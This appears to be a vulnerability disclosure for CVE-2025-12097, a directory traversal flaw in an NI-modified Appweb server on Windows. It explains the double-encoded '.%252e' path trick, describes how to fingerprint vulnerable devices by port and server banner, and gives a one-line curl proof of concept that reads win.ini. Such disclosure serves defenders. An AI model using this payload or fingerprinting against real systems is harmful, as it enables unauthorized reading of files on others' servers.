# CVE-2025-12097

## Description

NI modification of Appweb server contains a directory traversal vulnerability that allows an attacker to read arbitrary files on the server.

URI path `/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini`  will be converted to:

`pathInfo cchar * "/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini” 0x000000010076f808` which is a valid URI and appweb does not block this request. This is then passed to custom handler which in this case returns the contents of any file requested.

Due to nature of affected software, impacted devices are exclusively Microsoft Windows systems.

Highest vulnerable version observed: 12.0.0.

## Identification of vulnerable devices

The affected devices can be identified by the following characteristics:

Not always present, but in most cases the service runs on port 3580, other ports may include 8080 and 80.

Server response to `/`
```html
HTTP/1.1 404 Not Found
Server: Mbedthis-Appweb/2.5.0
Date: Thu, 11 Dec 2025 18:23:26 GMT
Connection: keep-alive
Keep-Alive: timeout=60000, max=100
Content-Type: text/html
Content-length: 126

<HTML><HEAD><TITLE>Document Error: Not Found</TITLE></HEAD>
<BODY><H2>Access Error: 404 -- Not Found</H2>
</BODY></HTML>
```

## PoC

To exploit this vulnerability, you can use the following command:
```bash
curl http://<TARGET>:3580/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini
```

You will see the contents of the `win.ini` file if the target is vulnerable.